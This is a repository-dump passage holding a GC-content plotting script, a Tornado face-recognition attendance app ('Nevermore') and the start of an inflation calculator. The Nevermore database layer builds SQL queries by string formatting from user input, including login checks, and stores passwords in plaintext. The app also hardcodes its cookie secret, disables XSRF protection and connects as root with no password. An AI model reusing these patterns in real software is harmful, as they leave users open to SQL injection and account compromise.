ax.xaxis.set_major_locator(ticker.MultipleLocator(max(interval,interval2))) #the interval of x axis should be the max value\r\n plt.ylim(min(min(gc_list),min(gc_list2))-0.1,max(max(gc_list),max(gc_list2))+0.1)\r\n plt.title(f_basename+\" VS \"+f_basename2,fontsize=30,fontweight=\"heavy\")\r\n plt.xlabel('Position',fontsize = 20)\r\n plt.ylabel('GC 
content',fontsize = 20)\r\n plt.tick_params(labelsize=15)\r\n plt.legend(ncol=1,fontsize=15,loc=\"upper right\")\r\n #add the text of window size and step, and make its position in the middle bottom of the graph\r\n plt.text(max(len(whole_seq),len(whole_seq2))/2,min(min(gc_list),min(gc_list2))-0.1+0.02,s=\"window size=\"+str(window_size)+\"\\n\"+\"step=\"+str(step),horizontalalignment='center',verticalalignment='top',fontsize=12,color=\"slategrey\")\r\n plt.savefig(f_basename+\"_VS_\"+f_basename2+\".png\")\r\n\r\n#The following part is to use the function with different arguments\r\n#check if the file is missing\r\nif args.mode[0]== \"s\" and not args.file: \r\n print(\"input file missing, nothing will happen\")\r\n sys.exit()\r\n\r\n\r\n#mode of single file\r\n#input file and processing\r\nif args.mode[0]==\"s\" and args.file: #if this argument is used\r\n file = args.file[0]\r\n try: #check the existence of file\r\n open(file,\"r\")\r\n except IOError:\r\n print(\"file does not exit,please check the file name\")\r\n sys.exit() \r\n file_processing() \r\n print(\"\\n\"+\"File is read successfully!\"+\"\\n\")\r\n if args.range: #use the range argument to filter sequences\r\n print(\"sequence filtering is processing\" + \"\\n\")\r\n if args.range[0]> args.range[1]:\r\n print (\"lower limit cannot be higher than upper limit!\")\r\n sys.exit()\r\n else:\r\n sequence_filter()\r\n print(\"Output file is saved as \" + f_basename+\"_filter.out\")\r\n if not args.range: \r\n if not args.window or not args.step:\r\n print( \"Histogram of GC content distribution will be plotted automatically\" + \"\\n\")\r\n GC_content_distribution()\r\n print(\"Histogram is saved as \" + f_basename +\"_dist.png\")\r\n if args.window and args.step: #use the argument of window size and step\r\n print(\"Line chart is being processed\" +\"\\n\")\r\n calculate_GC()\r\n single_line_chart()\r\n print(\"Line chart is saved as \" + f_basename +\"_line.png\" + \"\\n\")\r\n \r\n \r\n \r\n#mode of pairwise comparison \r\n#check if the file is missing\r\nif args.mode[0]==\"c\" and not args.file: \r\n print(\"input file missing, nothing will happen\")\r\n sys.exit()\r\n \r\nif args.mode[0]==\"c\" and len(args.file) ==1: \r\n print(\"Two files are needed, please input another file\")\r\n sys.exit()\r\n \r\nif args.mode[0]==\"c\" and args.file: #if this argument is used\r\n file = args.file[0]\r\n try: #check the existence of file\r\n open(file,\"r\")\r\n except IOError:\r\n print(\"file does not exit,please check the file name\")\r\n sys.exit() \r\n file_processing()\r\n file2 = args.file[1]\r\n try: #check the existence of file\r\n open(file2,\"r\")\r\n except IOError:\r\n print(\"file2 does not exit,please check the file name\")\r\n sys.exit() \r\n another_file_processing()\r\n if args.window and args.step:\r\n print(\"Line chart is being processed\")\r\n calculate_GC()\r\n another_GC_and_comparison_plot()\r\n print(\"Line chart is saved as \" + f_basename+\"_VS_\"+f_basename2 +\".png\" + \"\\n\")\r\n \r\n \r\n#mode of batch processing\r\n#this mode is to generate line charts of multiple files\r\nif args.mode[0]==\"b\":\r\n#retrive the path of this script\r\n#when running the script, it should be put in the same directory of the target files\r\n script_path=os.path.dirname(os.path.realpath('__file__'))\r\n target_file=[] #index of files to be processed\r\n for root,dirs,files in os.walk(script_path):\r\n for file in files:\r\n if \"py\" not in file:\r\n target_file.append(file)\r\n for file in target_file:\r\n 
file_processing()\r\n print(\"\\n\"+\"File is read successfully!\"+\"\\n\")\r\n if args.window and args.step:\r\n print(\"Line chart is being processed\" +\"\\n\")\r\n calculate_GC()\r\n single_line_chart()\r\n print(\"Line chart is saved as \" + f_basename +\"_line.png\" + \"\\n\")\r\n \r\n\r\n#mode of batch comparison\r\n#this mode is batch processing of pairwise comparison \r\nif args.mode[0]==\"bc\":\r\n#retrive the path of the script\r\n#when running the script, it should be put in the same directory of the target files\r\n script_path=os.path.dirname(os.path.realpath('__file__'))\r\n target_file=[] #index of files to be processed\r\n for root,dirs,files in os.walk(script_path):\r\n for file in files:\r\n if \"py\" not in file:\r\n target_file.append(file) \r\n if not args.window or not args.step:\r\n print(\"please set the window size and step\")\r\n if args.window and args.step:\r\n for i in range(0,len(target_file)):\r\n for j in range(i+1,len(target_file)):\r\n file = target_file[i]\r\n file2 = target_file[j]\r\n file_processing()\r\n another_file_processing()\r\n calculate_GC()\r\n another_GC_and_comparison_plot()\r\n print(\"Line chart is saved as \" + f_basename+\"_VS_\"+f_basename2 +\".png\" + \"\\n\")\r\n \r\n \r\n\r\n#the following part is to plot all lines in one figure \r\ndef all_in_one_plot():\r\n#this function is to draw a simple line of each file\r\n global mean_gc\r\n total_gc=0\r\n for value in gc_list:\r\n total_gc=total_gc+value\r\n mean_gc=total_gc/len(gc_list) \r\n x = middle_p\r\n y = gc_list\r\n ax.plot(x,y,label=f_basename+\":mean=\"+str(round(mean_gc,2)),linewidth=2.3)\r\n \r\nif args.mode[0]==\"a\": \r\n script_path=os.path.dirname(os.path.realpath('__file__'))\r\n target_file=[] #index of files to be processed\r\n for root,dirs,files in os.walk(script_path):\r\n for file in files:\r\n if \"py\" not in file:\r\n target_file.append(file) \r\n if not args.window or not args.step:\r\n print(\"please set the window size and step\")\r\n if args.window and args.step:\r\n fig = plt.figure(figsize=(20,10),dpi=300) #generate a blank figure , add a line every time the file is read\r\n ax = fig.add_subplot(1, 1, 1)\r\n total_mean = 0\r\n interval_assembly=[]\r\n whole_length_assembly=[]\r\n min_gc=[]\r\n max_gc=[]\r\n for file in target_file:\r\n file_processing() \r\n calculate_GC()\r\n all_in_one_plot()\r\n total_mean = total_mean + mean_gc \r\n interval_assembly.append(interval) #store important values in list\r\n whole_length_assembly.append(len(whole_seq))\r\n min_gc.append(min(gc_list)) \r\n max_gc.append(max(gc_list))\r\n total_mean = total_mean / len(target_file)\r\n #plot baseline of mean value\r\n a = [0,max(whole_length_assembly)]\r\n b = [total_mean,total_mean]\r\n ax.plot(a,b,label=\"total_mean=\"+str(round(total_mean,2)),color=\"lightcoral\",linewidth=2,linestyle=\"--\")\r\n ax.xaxis.set_major_locator(ticker.MultipleLocator(max(interval_assembly))) #the interval value is the max one\r\n ax.ticklabel_format(useOffset=False, style='plain') #not show the scientific notation\r\n plt.ylim(min(min_gc)-0.1,max(max_gc)+0.1)\r\n plt.xlabel('Position',fontsize = 20)\r\n plt.ylabel('GC content',fontsize = 20)\r\n plt.tick_params(labelsize=15)\r\n plt.legend(ncol=1,fontsize=12,loc=\"upper right\") \r\n #add the text and make its position in the middle bottom of the graph\r\n plt.text(max(whole_length_assembly)/2,min(min_gc)-0.1+0.02,s=\"window 
size=\"+str(window_size)+\"\\n\"+\"step=\"+str(step),horizontalalignment='center',verticalalignment='top',fontsize=12,color=\"slategrey\")\r\n plt.savefig(\"all_line.png\") \r\n print(\"Line chart is saved as all_line.png\")\r\n \r\n\r\n" } ]
num_files: 2

repo_name: ididy/Nevermore
repo_url: https://github.com/ididy/Nevermore
snapshot_id: 9aa5daa407b2e4d58e0083a26e952561924f9fcc
revision_id: 99f779ec206360bb5e1c47b8d15b137524224e91
directory_id: e648b3ab5102e144ed52ea3712a01e060ca3abb9
branch_name: refs/heads/master
visit_date: 2021-01-20T23:40:24.758634
revision_date: 2013-03-28T18:24:56
committer_date: 2013-03-28T18:24:56
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.5678030252456665, "alphanum_fraction": 0.5700757503509521, "avg_line_length": 34.20000076293945, "blob_id": "6e725c5837911c40b45db8bd6d455bfb465f5fe7", "content_id": "09a8f44a689ca26f3bd05269a8a67f7d1322b91e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2640, "license_type": "no_license", "max_line_length": 68, "num_lines": 75, "path": "/page_render.py", "repo_name": "ididy/Nevermore", "src_encoding": "UTF-8", "text": "import tornado.web\nfrom datetime import datetime\nimport dbhandler\nimport handler\nimport records\n\nclass MainPage(tornado.web.RequestHandler):\n def get(self):\n self.render(\"static/html/main.html\")\n\nclass ManagePage(handler.AuthBaseHandler):\n @tornado.web.authenticated\n def get(self):\n sid = tornado.escape.xhtml_escape(self.current_user)\n db = dbhandler.DBHandler()\n staff = db.get_staff(sid)[0]\n sname = staff['name']\n self.render(\"static/html/manage.html\", sname = sname)\n\nclass StaffInfoPage(handler.AuthBaseHandler):\n @tornado.web.authenticated\n def get(self):\n sid = tornado.escape.xhtml_escape(self.current_user)\n db = dbhandler.DBHandler()\n staff = db.get_staff(sid)[0]\n self.render(\"static/html/staff_info.html\", \n sid = sid, \n sname = staff['name'], \n age = staff['age'], \n idnumber = staff['idnumber'], \n department = staff['department'],\n ondutytime = staff['ondutytime'],\n offdutytime = staff['offdutytime'],\n )\n\nclass StaffRecordPage(handler.AuthBaseHandler):\n @tornado.web.authenticated\n def get(self):\n sid = tornado.escape.xhtml_escape(self.current_user)\n db = dbhandler.DBHandler()\n staff = db.get_staff(sid)[0]\n sname = staff['name']\n try:\n year = self.get_argument(\"year\")\n month = self.get_argument(\"month\")\n except:\n year = datetime.now().year\n month = datetime.now().month\n r = records.staff_monthly_record(sid, str(year), str(month))\n self.render(\"static/html/staff_record.html\", \n sname = sname,\n onduty = r[0],\n offduty = r[1],\n year = year,\n month = month,\n )\n\nclass AdminHomePage(handler.AuthAdminBaseHandler):\n def get(self):\n if not self.current_user:\n self.redirect(\"/login_admin\")\n return False;\n name = tornado.escape.xhtml_escape(self.current_user)\n db = dbhandler.DBHandler()\n #staff = db.get_staff(sid)[0]\n #sname = staff['name']\n self.render(\"static/html/admin_home.html\", name = name)\n\nclass AddStaffPage(handler.AuthAdminBaseHandler):\n def get(self):\n if not self.current_user:\n self.redirect(\"/login_admin\")\n return False;\n name = tornado.escape.xhtml_escape(self.current_user)\n self.render(\"static/html/add_staff.html\", name = name)\n" }, { "alpha_fraction": 0.53031325340271, "alphanum_fraction": 0.5401445627212524, "avg_line_length": 33.573333740234375, "blob_id": "ad75b3b6c2b8bf89099834bf247d98a063a8e40c", "content_id": "265ece1d5ca31b54db36aafaa8caeb5c28d037b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10375, "license_type": "no_license", "max_line_length": 168, "num_lines": 300, "path": "/handler.py", "repo_name": "ididy/Nevermore", "src_encoding": "UTF-8", "text": "#coding=utf-8\nimport tornado.web\nimport os\nimport StringIO\nimport numpy\nimport cv2\nfrom PIL import Image\nimport base64\nfrom datetime import datetime\n\nimport face_detect\nimport face_recognise\nimport pic_pretreatment\nimport dbhandler\nimport checkin\n\nTIMEFORMAT = \"%Y-%m-%d %X\"\n\n# Manhattan Distance\ndef L1(v1,v2):\n return sum([abs(v1[i]-v2[i]) for 
i in range(len(v1))])\n\nclass RecogniseHandler(tornado.web.RequestHandler):\n def post(self):\n pic = self.get_argument(\"pic\")\n sid = self.get_argument(\"sid\")\n picData = base64.b64decode(pic)\n buf = StringIO.StringIO()\n buf.write(picData)\n buf.seek(0)\n # face detection\n region = face_detect.process(imgData = buf)\n # pretreatment\n if region:\n cvImage = pic_pretreatment.process(region)\n cv2Data = numpy.asarray(cvImage[:])\n # get mean and eigenvectors from DB\n db = dbhandler.DBHandler()\n try:\n mean, eigenvectors = db.get_pca()\n except:\n print \"Error: Failed to get mean and eigenvectors from DB\"\n # project\n # convert mean and eigenvectors to numpy array\n mean_list = [float(i) for i in mean.split(\" \")]\n mean_numpy = numpy.asarray(mean_list[:]).reshape(1, -1)\n\n vec_strings = [s for s in eigenvectors.split(\"|\")]\n eigenvectors_list = []\n for vec_str in vec_strings:\n vec_list = [float(i) for i in vec_str.split(\" \")]\n eigenvectors_list.append(vec_list)\n eigenvectors_numpy = numpy.asarray(eigenvectors_list[:]).reshape(len(eigenvectors_list),-1)\n\n # get eigenface\n eigenface = face_recognise.get_eigenface(mean_numpy, eigenvectors_numpy, cvData = cv2Data)\n # compute distance\n staff = db.get_staff(sid = sid)\n if len(staff) == 0:\n self.write(\"-2\") # sid is not exist\n return False\n eface_str = staff[0][\"eigenface\"]\n staff_dis = float(staff[0][\"distance\"])\n eface = [float(i) for i in eface_str.split(\" \")]\n dis = L1(eigenface[0], eface)\n '''\n print eigenface[0]\n print eface\n print dis\n '''\n if dis <= staff_dis:\n image_path = \"static/records/checkin/%s_%s.jpg\" % (sid, datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\"))\n buf.seek(0)\n image = Image.open(buf)\n image.save(image_path, \"JPEG\", quality = 80)\n msg = checkin.checkin(sid, image_path)\n if msg[1] == -1 or msg[1] == 0:\n os.remove(image_path) # check in error\n reponse_msg = str(msg[1]) + '|' + msg[0]\n self.write(reponse_msg)\n print msg[0]\n else:\n self.write(\"-1\")\n else:\n self.write(\"-1\")\n\n\nclass UploadIMGHandler(tornado.web.RequestHandler):\n def post(self):\n # get picture and sid\n pic = self.get_argument(\"pic\")\n sid = self.get_argument(\"sid\")\n\n picData = base64.b64decode(pic)\n buf = StringIO.StringIO()\n buf.write(picData)\n buf.seek(0)\n face_tmp_path = \"static/records/faces/%s_tmp.jpg\" % sid\n grayface_tmp_path = \"static/records/grayfaces/%s_tmp.jpg\" % sid\n\n # face detection\n region = face_detect.process(imgData = buf, outfile = face_tmp_path)\n # pretreatment\n if region:\n pic_pretreatment.process(region, \n powfile = grayface_tmp_path,\n )\n self.write(\"success\")\n else:\n self.write(\"failed\")\n\nclass AddStaffHandler(tornado.web.RequestHandler):\n def post(self):\n # get info\n sid = self.get_argument(\"sid\")\n pwd = self.get_argument(\"pwd\")\n name = self.get_argument(\"name\")\n idnumber = self.get_argument(\"idnumber\")\n age = int(self.get_argument(\"age\"))\n department = int(self.get_argument(\"department\"))\n ondutytime = self.get_argument(\"ondutytime\")\n offdutytime = self.get_argument(\"offdutytime\")\n \n grayface_tmp_path = \"static/records/grayfaces/%s_tmp.jpg\" % sid\n db = dbhandler.DBHandler()\n\n # write staff information to DB\n try:\n db.add_staff(sid = sid, pwd = pwd, name = name, idnumber = idnumber, age = age, department = department, ondutytime = ondutytime, offdutytime = offdutytime)\n except:\n print \"Error: Add staff information failed. 
sid = %s\" % sid\n self.write(\"failed\")\n return False\n\n # store new face picture to DB\n grayface = cv2.imread(grayface_tmp_path, 0)\n grayface = grayface.reshape(100 * 100)\n grayface_str = \"\"\n for p in grayface:\n grayface_str += str(p)\n grayface_str += \" \"\n grayface_str = grayface_str[:-1]\n try:\n db.store_face(sid, grayface_str)\n except:\n print \"Error: Store image to DB failed. sid = %s\" % sid\n self.write(\"failed\")\n return False\n\n # Compute PCA - Training\n mean, eigenvectors = face_recognise.computePCA()\n\n # Update all staffs' eigenface\n staffs = db.look_table(\"staff\")\n efaces = {}\n for staff in staffs:\n sid = staff[\"sid\"]\n try:\n records = db.get_face(sid)\n except:\n print \"Error: Get image from DB failed. sid = %s\" % sid\n self.write(\"failed\")\n return False\n nm = numpy.fromstring(records[0]['img'], dtype = numpy.uint8, sep = \" \")\n nm = nm.reshape(100, -1)\n eigenface = face_recognise.get_eigenface(mean, eigenvectors, cvData = nm)\n l = [\"%.8f\" % number for number in eigenface[0]]\n eigenface_str = \" \".join(l)\n try:\n db.update_eigenface(sid, eigenface_str)\n except:\n print \"Error: Write eigenface to DB failed. sid = %s\" % sid\n self.write(\"failed\")\n return False\n efaces[sid] = eigenface\n\n # Update all staffs' distance\n ratio = 2.0\n for sid in efaces:\n theface = efaces[sid]\n min = 10000000.0\n for other in efaces:\n if other != sid:\n dis = L1(theface[0], efaces[other][0])\n if dis < min:\n min = dis\n try:\n db.update_distance(sid, min / ratio)\n except:\n print \"Error: Write distance to DB failed. sid = %s\" % sid\n self.write(\"failed\")\n return False\n\n # Write mean and eigenvectors to DB\n # mean to string\n m = [\"%.8f\" % number for number in mean[0]]\n mean_str = \" \".join(m)\n # eigenvectors to string\n eigenvectors_str = \"\"\n for vec in eigenvectors:\n v = [\"%.8f\" % number for number in vec]\n vec_str = \" \".join(v)\n eigenvectors_str += vec_str\n eigenvectors_str += \"|\"\n eigenvectors_str = eigenvectors_str[:-1]\n try:\n db.update_pca(mean_str, eigenvectors_str)\n except:\n print \"Error: Update mean and eigenvectors to DB failed. 
\"\n self.write(\"failed\")\n return False\n\n os.remove(grayface_tmp_path)\n self.write(\"success\")\n\n# staff manage\nclass AuthBaseHandler(tornado.web.RequestHandler):\n def get_current_user(self):\n return self.get_secure_cookie(\"sid\")\n\nclass LoginHandler(AuthBaseHandler):\n def get(self):\n self.render(\"static/html/login.html\")\n\n def post(self):\n db = dbhandler.DBHandler()\n sid = self.get_argument(\"sid\")\n pwd = self.get_argument(\"pwd\")\n check = db.staff_login(sid, pwd)\n if check == 1:\n self.set_secure_cookie(\"sid\", sid)\n self.write(\"success\")\n elif check == -1:\n self.write(\"siderror\")\n elif check == 0:\n self.write(\"pwderror\")\n\nclass LogoutHandler(AuthBaseHandler):\n @tornado.web.authenticated\n def get(self):\n self.clear_cookie(\"sid\")\n self.redirect(\"/login\")\n\nclass RecordInfoHandler(AuthBaseHandler):\n @tornado.web.authenticated\n def post(self):\n db = dbhandler.DBHandler()\n sid = tornado.escape.xhtml_escape(self.current_user)\n year = self.get_argument(\"year\")\n month = self.get_argument(\"month\")\n day = self.get_argument(\"day\")\n rtype = self.get_argument(\"type\")\n time1 = \"%s-%s-%d 00:00:00\" % (year, month, int(day))\n time2 = \"%s-%s-%d 23:59:59\" % (year, month, int(day))\n records = db.get_checkin_records(sid, time1, time2)\n for r in records:\n if r['rtype'] == int(rtype):\n self.write(str(r['rtime']))\n\n# admin manage\nclass AuthAdminBaseHandler(tornado.web.RequestHandler):\n def get_current_user(self):\n return self.get_secure_cookie(\"name\")\n\nclass LoginAdminHandler(AuthAdminBaseHandler):\n def get(self):\n self.render(\"static/html/login_admin.html\")\n\n def post(self):\n db = dbhandler.DBHandler()\n name = self.get_argument(\"name\")\n pwd = self.get_argument(\"pwd\")\n check = db.admin_login(name, pwd)\n if check == 1:\n self.set_secure_cookie(\"name\", name)\n self.write(\"success\")\n elif check == -1:\n self.write(\"aiderror\")\n elif check == 0:\n self.write(\"pwderror\")\n\nclass LogoutAdminHandler(AuthAdminBaseHandler):\n def get(self):\n if self.current_user:\n name = tornado.escape.xhtml_escape(self.current_user)\n self.clear_cookie(\"name\")\n self.redirect(\"/login_admin\")\n\nclass CheckSIDHandler(AuthAdminBaseHandler):\n def post(self):\n if self.current_user:\n db = dbhandler.DBHandler()\n sid = self.get_argument(\"sid\")\n records = db.get_staff(sid)\n if len(records) == 0:\n self.write(\"nosid\")\n else:\n self.write(\"hadsid\")\n else:\n self.redirect(\"/login_admin\")\n\n\n\n" }, { "alpha_fraction": 0.5105708241462708, "alphanum_fraction": 0.5295982956886292, "avg_line_length": 24.567567825317383, "blob_id": "84be5fdc42bc044da66a87386c3bbae9221f4524", "content_id": "12daa7b9348d82fde6b59dacdd13dbacdc102120", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 946, "license_type": "no_license", "max_line_length": 70, "num_lines": 37, "path": "/tools/update_dis.py", "repo_name": "ididy/Nevermore", "src_encoding": "UTF-8", "text": "import numpy\nimport sys\nsys.path.append('..')\n\nimport dbhandler\nimport face_recognise\n\nratio = 2.0\n\n# Manhattan Distance\ndef L1(v1,v2):\n return sum([abs(v1[i]-v2[i]) for i in range(len(v1))])\n\nif __name__ == \"__main__\":\n db = dbhandler.DBHandler()\n staffs = db.look_table(\"staff\")\n efaces = {}\n for staff in staffs:\n sid = staff[\"sid\"]\n eface_str = staff[\"eigenface\"]\n eigenface = [float(i) for i in eface_str.split(\" \")] \n efaces[sid] = eigenface\n\n # Update all staffs' distance\n for sid 
in efaces:\n theface = efaces[sid]\n min = 10000000.0\n for other in efaces:\n if other != sid:\n dis = L1(theface, efaces[other])\n if dis < min:\n min = dis\n try:\n db.update_distance(sid, min / ratio)\n except:\n print \"Error: Write distance to DB failed. sid = %s\" % sid\n exit()\n" }, { "alpha_fraction": 0.5665627717971802, "alphanum_fraction": 0.5794746279716492, "avg_line_length": 40.592594146728516, "blob_id": "4d212ae196fb9f18df5aea975b37615c26818b57", "content_id": "b69d9e287223e1c80226d7f5ff13e7ce8b74e00b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4492, "license_type": "no_license", "max_line_length": 288, "num_lines": 108, "path": "/dbhandler.py", "repo_name": "ididy/Nevermore", "src_encoding": "UTF-8", "text": "import tornado.database\n\nDEFAULT_ON_DUTY_TIME = \"8:30\"\nDEFAULT_OFF_DUTY_TIME = \"17:30\"\n\n# Fix time_zone problem\nclass Connection(tornado.database.Connection):\n def __init__(self, mysql_host, mysql_database, mysql_user, mysql_password):\n super(Connection, self).__init__(\n host=mysql_host,\n database=mysql_database,\n user=mysql_user,\n password=mysql_password\n )\n self._db_args[\"init_command\"] = 'SET time_zone = \"+8:00\"'\n try:\n self.reconnect()\n except Exception:\n logging.error(\"Cannot connect to MySQL on %s\", self.host,\n exc_info=True)\n\nclass DBHandler:\n # Init the connection\n def __init__(self):\n self.db = Connection(\"localhost\", \"nevermore\", \"root\", \"\")\n \n # Login check \n def staff_login(self, sid, pwd):\n if self.db.execute_rowcount(\"SELECT * FROM staff WHERE sid = '%s'\" % (sid)) == 0:\n return -1\n if self.db.execute_rowcount(\"SELECT * FROM staff WHERE sid = '%s' and pwd = '%s'\" % (sid, pwd)) == 1:\n return 1\n else:\n return 0\n\n # Admin Login check \n def admin_login(self, name, pwd):\n if self.db.execute_rowcount(\"SELECT * FROM admin WHERE name = '%s'\" % (name)) == 0:\n return -1\n if self.db.execute_rowcount(\"SELECT * FROM admin WHERE name = '%s' and pwd = '%s'\" % (name, pwd)) == 1:\n return 1\n else:\n return 0\n \n # Look up the table\n def look_table(self, table):\n return self.db.query(\"SELECT * FROM %s\" % table)\n \n # Add one staff in db\n def add_staff(self, sid, pwd, name, idnumber, age, department,\n ondutytime = DEFAULT_ON_DUTY_TIME, \n offdutytime = DEFAULT_OFF_DUTY_TIME, \n distance = 0.0, \n eigenface = \" \",\n ):\n self.db.execute(\"INSERT INTO staff (sid, pwd, name, idnumber, age, department, ondutytime, offdutytime, distance, eigenface) VALUES ('%s', '%s', '%s', '%s', %d, %d, '%s', '%s', %f, '%s')\" % (sid, pwd, name, idnumber, age, department, ondutytime, offdutytime, distance, eigenface))\n\n #Get one staff's info\n def get_staff(self, sid):\n return self.db.query(\"SELECT * FROM staff WHERE sid = '%s'\" % (sid))\n\n #Update one staff's eigenface in db\n def update_eigenface(self, sid, eigenface):\n self.db.execute(\"UPDATE staff SET eigenface = '%s' WHERE sid = '%s'\" % (eigenface, sid))\n\n #Update one staff's distance in db\n def update_distance(self, sid, distance):\n self.db.execute(\"UPDATE staff SET distance = %f WHERE sid = '%s'\" % (distance, sid))\n\n #Delete one staff in db\n def del_staff(self, sid):\n self.db.execute(\"DELETE FROM staff WHERE sid = '%s'\" % sid)\n \n #Add one log in db\n def add_log(self, uid, ltype, content):\n self.db.execute(\"INSERT INTO log (uid, ltype, content) VALUES ('%s', %d, '%s',)\" % (uid, ltype, content))\n\n #Update mean and eigenvectors\n def update_pca(self, mean, eigenvectors):\n 
self.db.execute(\"UPDATE setting SET value = '%s' WHERE skey = 'mean'\" % (mean))\n self.db.execute(\"UPDATE setting SET value = '%s' WHERE skey = 'eigenvectors'\" % (eigenvectors))\n\n # Get mean and eigenvectors\n def get_pca(self):\n mean = self.db.query(\"SELECT value FROM setting WHERE skey = 'mean'\")\n eigenvectors = self.db.query(\"SELECT value FROM setting WHERE skey = 'eigenvectors'\")\n return (mean[0]['value'], eigenvectors[0]['value'])\n\n # Store face image to DB\n def store_face(self, sid, img_string):\n self.db.execute(\"INSERT INTO image (sid, img) VALUES ('%s', '%s')\" % (sid, img_string))\n\n # Get face image by sid\n def get_face(self, sid):\n return self.db.query(\"SELECT * FROM image WHERE sid = '%s'\" % (sid))\n\n # Get checkin records for a period time\n def get_checkin_records(self, sid, time1, time2):\n return self.db.query(\"SELECT * FROM record WHERE sid = '%s' and rtime >= '%s' and rtime <= '%s'\" % (sid, time1, time2))\n\n # Add checkin record in db\n def add_checkin_record(self, sid, rtype, rstate, rimage):\n self.db.execute(\"INSERT INTO record (sid, rtype, rstate, rimage) VALUES ('%s', %d, %d, '%s')\" % (sid, rtype, rstate, rimage))\n\nif __name__ == '__main__':\n db = DBHandler()\n for r in db.get_checkin_records('224', '2013-03-26 00:00:00', '2013-3-30 23:59:59'):\n print r['rtime']\n" }, { "alpha_fraction": 0.6631234884262085, "alphanum_fraction": 0.6663941144943237, "avg_line_length": 28.119047164916992, "blob_id": "1158d9e8315f4edf425044ada1cd2653a4d5d4c5", "content_id": "b556da825c43743ca8bb76dbee39ac4fba21611f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1223, "license_type": "no_license", "max_line_length": 92, "num_lines": 42, "path": "/main.py", "repo_name": "ididy/Nevermore", "src_encoding": "UTF-8", "text": "import tornado.ioloop\nimport tornado.web\nimport os\nimport handler\nimport page_render\n\nsettings = {\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n \"cookie_secret\": \"61oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=\",\n \"login_url\": \"/login\",\n \"xsrf_cookies\": False,\n}\n\napplication = tornado.web.Application([\n (r\"/\", page_render.MainPage),\n\n (r\"/manage\", page_render.ManagePage),\n (r\"/staff_info\", page_render.StaffInfoPage),\n (r\"/staff_record\", page_render.StaffRecordPage),\n\n (r\"/admin_home\", page_render.AdminHomePage),\n (r\"/add_staff\", page_render.AddStaffPage),\n\n (r\"/login\", handler.LoginHandler),\n (r\"/login_admin\", handler.LoginAdminHandler),\n (r\"/logout\", handler.LogoutHandler),\n (r\"/logout_admin\", handler.LogoutAdminHandler),\n\n (r\"/recognise\", handler.RecogniseHandler),\n\n (r\"/add_new_staff\", handler.AddStaffHandler),\n (r\"/upload_image\", handler.UploadIMGHandler),\n (r\"/checksid\", handler.CheckSIDHandler),\n\n (r\"/record_info\", handler.RecordInfoHandler),\n\n (r\"/(favicon\\.ico)\", tornado.web.StaticFileHandler, dict(path=settings['static_path'])),\n], debug = True, **settings)\n\nif __name__ == \"__main__\":\n application.listen(8888)\n tornado.ioloop.IOLoop.instance().start()\n" } ]
num_files: 5

repo_name: sergioalves20/TAI
repo_url: https://github.com/sergioalves20/TAI
snapshot_id: e679a7cc9b91f1ef29b19785aae63e3414cca9d6
revision_id: 5d0120b7256a45490cb979acf3dd652c4b58a948
directory_id: 4079dd040add7ec972965cec002e753493440c08
branch_name: refs/heads/main
visit_date: 2023-09-04T02:55:59.601324
revision_date: 2021-10-12T19:09:25
committer_date: 2021-10-12T19:09:25
github_id: 415148539
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.7475247383117676, "alphanum_fraction": 0.7475247383117676, "avg_line_length": 56.57143020629883, "blob_id": "ccf69de73db9c7ceac543e82a4aca382ed4ad340", "content_id": "5c41be58d3db8038982fe99b285f1595e7d63fbe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 414, "license_type": "permissive", "max_line_length": 102, "num_lines": 7, "path": "/README.md", "repo_name": "sergioalves20/TAI", "src_encoding": "UTF-8", "text": "# TAI\n <p>Taxa Anual de Inflação</p>\n <p>Meu projeto como iniciante em Python</p>\n <p>Dados recolhidos na página oficial do Instituto Nacional de Estatística de Cabo Verde</p>\n <p>Serve para atualizar um valor (por ex. preço de um produto) acrescentando a Taxa Anual de Inflação\n a partir do ano da sua aquisição</p>\n <p>Este pequeno programa pode dar uma otima ajuda quando se faz um orçamento.</p>\n\n" }, { "alpha_fraction": 0.5663716793060303, "alphanum_fraction": 0.6460176706314087, "avg_line_length": 30.38888931274414, "blob_id": "045e42e352ea62518a9d4ed5408f40e6a946bc88", "content_id": "04310e47ba59a88c598f77ab961501c22b54d449", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 570, "license_type": "permissive", "max_line_length": 92, "num_lines": 18, "path": "/inecv/main.py", "repo_name": "sergioalves20/TAI", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nfrom uteis import uteis\n\n\nuteis.titulo (2, 'CÁLCULO DO VALOR ACRESCIDO DA TAXA ANUAL DE INFLAÇÃO')\nprint ('\\033[33mDADOS DISPONÍVEIS\\033[m: ENTRE O ANO 1990 E 2020')\nprint ('\\033[33mFONTE\\033[m: Instituto Nacional de Estatística de Cabo Verde (INEcv)\\033[m')\nprint ('')\n\nwhile True:\n print (uteis.dados ())\n resp = ' '\n while resp not in 'SN':\n resp = str (input ('\\033[31mDeseja continuar? 
